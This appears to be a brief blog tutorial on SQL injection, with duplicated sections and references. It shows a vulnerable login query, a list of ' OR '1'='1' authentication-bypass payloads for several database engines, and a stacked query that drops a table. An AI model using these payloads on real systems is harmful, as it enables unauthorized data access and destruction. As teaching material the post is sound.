1> SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). (http://www.acunetix.com/websitesecurity/sql-injection/)
2.1 SQL query=
SELECT id FROM users WHERE username=’username’ AND password=’password’
An attacker can also comment out the rest of the SQL statement to control the execution of the SQL query further.
Above query will be:
SELECT id FROM users WHERE username='' OR '1'='1' --’ AND password=’password’
- An SQL Injection can destroy your database.
- SQL injection can provide an attacker with unauthorized access to sensitive data including, customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information.
- SQL Injection Based on 1=1 is Always True
2.1 SQL query=
SELECT id FROM users WHERE username=’username’ AND password=’password’
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1'
' OR '1'='1' %16
OR 1=1’
Above query will be:
SELECT id FROM users WHERE username='' OR '1'='1' --’ AND password=’password’
2.2 With sql query = SELECT * FROM category,
the attacker can change it something like this by adding (;)
SELECT * FROM category; DROP TABLE Suppliers
3> Reference:
http://download.oracle.com/oll/tutorials/SQLInjection/index.htm http://www.w3schools.com/sql/sql_quickref.asp
https://dev.mysql.com/doc/refman/5.0/en/comments.html https://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) http://en.wikipedia.org/wiki/SQL_injection
http://www.devdaily.com/blog/post/mysql/drop-mysql-tables-in-any-order-foreign-keys http://software-security.sans.org/developer-how-to/fix-sql-injection-in-java-hibernate http://www.mi.hdm-stuttgart.de/freedocs/index.jsp?topic=%2Fde.hdm_stuttgart.mi.lectures%2FsqlInjection.html
3> Reference:
http://download.oracle.com/oll/tutorials/SQLInjection/index.htm http://www.w3schools.com/sql/sql_quickref.asp
https://dev.mysql.com/doc/refman/5.0/en/comments.html https://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) http://en.wikipedia.org/wiki/SQL_injection
http://www.devdaily.com/blog/post/mysql/drop-mysql-tables-in-any-order-foreign-keys http://software-security.sans.org/developer-how-to/fix-sql-injection-in-java-hibernate http://www.mi.hdm-stuttgart.de/freedocs/index.jsp?topic=%2Fde.hdm_stuttgart.mi.lectures%2FsqlInjection.html
0 comments:
Post a Comment